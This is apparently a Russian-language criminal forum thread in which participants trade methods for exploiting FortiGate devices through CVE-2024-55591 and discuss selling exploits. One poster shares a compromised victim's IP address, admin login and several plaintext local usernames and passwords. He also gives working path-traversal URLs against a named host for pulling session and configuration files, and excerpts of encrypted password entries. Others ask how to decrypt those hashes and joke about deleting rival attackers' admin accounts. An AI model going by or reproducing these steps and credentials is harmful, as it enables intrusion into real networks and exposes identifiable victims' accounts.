[Forti] CVE-2024-55591 есть у кого рабочий сплойт?

[Vinki]

Это поэтому сорцы на форти искал?) Вообще интересно, шадоусервер заявляет что там 48к уязвимых

Какой смысл искать сорцы, если такие беспонтовые юзеры как furi только мозги ебут?
Без сорцов не выйдет продвинутся, к сожалению. А все горе-кодеры которые скажут "вот же он, готовый эксплойт" - пусть сгорят в аду. Ибо ремейк это полное дерьмо. Все бл#ть надеятся на то что эксплойты сольют в паблик, они возьмут допишут(кое-как) и сразу же продавать. По итогу берешь в руки - оказывается гавно. Настолько гавно что не хочеться позорить того кто продает. Это не отсылка к кому-то конкретному, а статистика о горе-кодерах.
Только время баеров крадут

 

[Balora19]

Какой смысл искать сорцы, если такие беспонтовые юзеры как furi только мозги ебут?
Без сорцов не выйдет продвинутся, к сожалению. А все горе-кодеры которые скажут "вот же он, готовый эксплойт" - пусть сгорят в аду. Ибо ремейк это полное дерьмо. Все бл#ть надеятся на то что эксплойты сольют в паблик, они возьмут допишут(кое-как) и сразу же продавать. По итогу берешь в руки - оказывается гавно. Настолько гавно что не хочеться позорить того кто продает. Это не отсылка к кому-то конкретному, а статистика о горе-кодерах.
Только время баеров крадут

40 валидов это с кастомным экспом или тем который в паблике? PS по сорцам это тебе к Asist , он мне ставил на вмку много версий год назад

 

[Vinki]

40 валидов это с кастомным экспом или тем который в паблике? PS по сорцам это тебе к Asist , он мне ставил на вмку много версий год назад

Кастомный
Спасибо, напишу ему

 

[JesterS]

CVE-2024-55591​

там еще неделю назад все закончилось) Остался только мусор без сетей

 

[barnaul]

40 уязвимых в юсе, которые уже отрабатывают. Нет смысла

Ну, мне на тест человек давал 50 ЮСЫ, 43 пробил за 5 часов работы (на 7 забили).

И про переписывальщиков экспов, это в мой огород, спасибо. Ценю твою заботу, как и ябедничество админу закрыть тему на деп (отказал в продаже обиженке), полупокер ты ебучий

Эксп от вочтавр рабочий, только там цикл лишний. Они видимо хотели делать input, интерактивную консоль для общения с вебсокетом. Там не сложно допилить, но между командами будет много мусора, которые придется дрочить ентерами.

Как писали ребята ресерчеры, они его выловили в дикой природе, там были однотипные креды. Таких пару штук было.
=================================================================
Host: 38.48.63.9:4443
Admin: admin_login:admin_password
Version: FG100F-7.0.8-FW-build0418-221012
VPN port: 443
LOCAL:
guest:guest
tmcelmeel:Lucvia!7073a
Nto3wmumb0J6Ck
Wuwkrt:dunDGJcFj
Rwr7nl:7d1iyqjUY
Scxr9q:wKuP5Aejy
Z82khw:a4z786DST

Сетки тоже есть, на тестах подрубались только к одной, но их там по логу несоклько таких.

Из-за состояния гонки, пробив может случится быстро или не очень быстро. Я ставил лимит на час, потом не пробитые перегонял по новой. На третьей фазе поставил 3 часа и пробило 18/25
Некотрые тугосери думают что надо взаимодействовать с вебсокетом и вытягивать дату (и с remote/admin или как его там), но нет. Вам нужно только добавить админа и выкачать конфиг через веб-запросы к админке. Парсим конфиг -> Профит
Эксп в логике отработки похож на 22ой

 

[barnaul]

В общем и целом, при работе с фортиками вам всегда нужно дотянуться до конфига. Остальное накуй не нужно.
Приведу пример с экспом 18го года, помните такой? /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Мало кто знает как вытянуть конфиг из него. Конфиг хранится в нескольких файлах, названия могут меняться но список их не велик. Методом перебора находим конфиги, и соблюдаем длинну строки. Например
Сессии: https://115.231.65.42:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
Конфиг https://115.231.65.42:8443/remote/fgt_lang?lang=../..////data/./config//sys_vd_root+root.conf.gz
Но т.к. символ + в урле конфига, енкодим его в 115.231.65.42:8443/remote/fgt_lang?lang=../..////data/./config//sys_vd_root%2Broot.conf.gz скачиваем, анзипаем и парсим. Профит

config user local
    edit "guest"
        set type password
        set passwd-time 2024-12-16 22:25:07
        set passwd ENC YfyWn0CcKGCuinT08B9PAiRBaqGRQ2SWTvsWdCFvzHcqKVwBz24RIi7+pfn+BEqwoRAAlanmoMg6HRAymTa3AkSDa4GQcE4EI3fnsP1Tr9z3AZ9+FtaYoj3P1HPVjt6o/YMAuSUS1G2F0Gep93MF9YVk2LIhze/juYtJwi8lYmyayhFKmhorGoXB0W41Jju4jU4qiw==
    next
    edit "HN1"
        set type password
        set passwd-time 2021-06-14 15:39:06
        set passwd ENC Crl9G7VPStRvP+NjNoILvnC6S75lpupUZWBVLnfWOwigopsM41lpidY6RQuSljAogl9XzYcco+5AaljUARcfz4K7SGN/TPKsA2BXMhvPKJbNkdK1mS4lgGXCca9OnNY03+Ziq5Sm1P0upCuFmDc85KO/ID6l90gV+NlNoKWvbpYz90R7CyOFcXkbo3K65NPqESEjgQ==
    next
    edit "复制HN1"
        set type password
        set passwd-time 2021-11-29 17:37:32
        set passwd ENC hiL+xhAI8n42ycawZqhJIPvQXjzKY7QMZ83SUKuAy/3cKbB2Gwu52VemSGK31mqZ/WsG8i7LpzQpYkDL9mc25GjpcfwUUVxVUtEFo5+vqDb/2kUlKz5urp2CrF9wU4EBZIQQJkWBMRdmt+OzV7dMxeoO252hCJ1K94H4aJyuBSoUUQoIbElqssPt1bFkU6ghfqjWaw==
    next
end

А сессий нету. Половина таких были не отработаны по причине, что сессий нет, но в конфиге были юзеры

 

[robomusk]

ну нормально накидал - а главное даже блек не предъявишь кстати вообще гитхаб + сатошидиск = 99% кидок

Предьявлялка не выросла. Ты купил что то и у тебя неработает? Админ не создался?

 

[DoomSlayer2002]

Предьявлялка не выросла. Ты купил что то и у тебя неработает? Админ не создался?

У матушки спроси насчёт моей предъявлялки

 

[NextGenPentesters]

На Github опубликован только код доказательства, но вы можете использовать его для каких-то целей. Попробуйте.

 

[nobody0]

Ок предположим каким то чудом show user local выдал список юзеров и пароли enc - как их дехешнуть? (в сети пишут - никак) https://github.com/GDATAAdvancedAnalytics/fortigategate вот такое видел.. но кажется это когда весь конфиг закриптованный. а тут речь идет чисто о пароле
или нужно добавлять админа командами или юзера - вот это путь?

 

[barnaul]

Ок предположим каким то чудом show user local выдал список юзеров и пароли enc - как их дехешнуть? (в сети пишут - никак) https://github.com/GDATAAdvancedAnalytics/fortigategate вот такое видел.. но кажется это когда весь конфиг закриптованный. а тут речь идет чисто о пароле
или нужно добавлять админа командами или юзера - вот это путь?

Репа ссылается на статью (кстати тоже запоздавшая, инфа 21-22 годов) https://cyber.wtf/2024/06/13/give-me-your-fortigate-configuration-backup-and-i-rule-your-network/. И этот метод только для хешей юзеров (local, ldap)
Если ты перечитаешь тему с начала, то на первой странице есть код дешифрования паролей. Если не осилишь, пиши в пм, помогу

 

[grupenfurer]

на какой форти не сунься, там уже 10-15 одних и тех же админов, кто то оперативно все отработал )

 

[barnaul]

на какой форти не сунься, там уже 10-15 одних и тех же админов, кто то оперативно все отработал )

Баг был обнаружен "in the wild", чему тут удивляться? До публикации ресерчеров его уже юзали

 

[grupenfurer]

Баг был обнаружен "in the wild", чему тут удивляться? До публикации ресерчеров его уже юзали

возможно аккуратно юзали, без создания юзера, до нахождение лдапа заполненного, например.
первую неделю после публикации сплойта, было не более 3х админов, щас же просто псдц, можно запускать сплойт в авто режиме на удаление по списку соседей )

 

[nobody0]

Репа ссылается на статью (кстати тоже запоздавшая, инфа 21-22 годов) https://cyber.wtf/2024/06/13/give-me-your-fortigate-configuration-backup-and-i-rule-your-network/. И этот метод только для хешей юзеров (local, ldap)
Если ты перечитаешь тему с начала, то на первой странице есть код дешифрования паролей. Если не осилишь, пиши в пм, помогу

Спасибо большое! интересный кей у них - Мэри had a littl..

а этих как нибудь можно дехэшить? тут кажется иной метод шифрования

 

[barnaul]

На админов этот метод не работает, и алгоритм я не знаю. Оно и не нужно, т.к. админ не ходит в сетку, он только для админки

 

[grupenfurer]

кто знает, можно ли статистику тащить этим сплойтом? к примеру количество активных сессий, без создания админ юзера чтоб

 

[barnaul]

кто знает, можно ли статистику тащить этим сплойтом? к примеру количество активных сессий, без создания админ юзера чтоб

Неа. Статистика это в /monitor/, динамические данные, в консоле их нету, только через админку.

 

[3ToN]

кто-нибудь знает как расшифровать хеши с фортигейта v7.4.7
так он выглядит

set passwd ENC zatzF7fCkZwvcPKxS31aGFXu20rFuP0hc5zhDokF9jgD40FbILnMjuclZ2z/57+yXcwAO4f7Uvgkl74x6E64cKz2MIKTkO6xQq4W6zxSLfJR3hscmuAPoEnuRFtH6hl8HxFU7+L9uAOHGPNW0BkmLsXlg+dhGl804JOX60VM7YJR1N4LuM71N9FzPDL7AU2XUicOAVlmMjY3dkVA

 

[FPS]

кто-нибудь знает как расшифровать хеши с фортигейта v7.4.7
так он выглядит

set passwd ENC zatzF7fCkZwvcPKxS31aGFXu20rFuP0hc5zhDokF9jgD40FbILnMjuclZ2z/57+yXcwAO4f7Uvgkl74x6E64cKz2MIKTkO6xQq4W6zxSLfJR3hscmuAPoEnuRFtH6hl8HxFU7+L9uAOHGPNW0BkmLsXlg+dhGl804JOX60VM7YJR1N4LuM71N9FzPDL7AU2XUicOAVlmMjY3dkVA

Столкнулся с такой же проблемой, нашел решение ?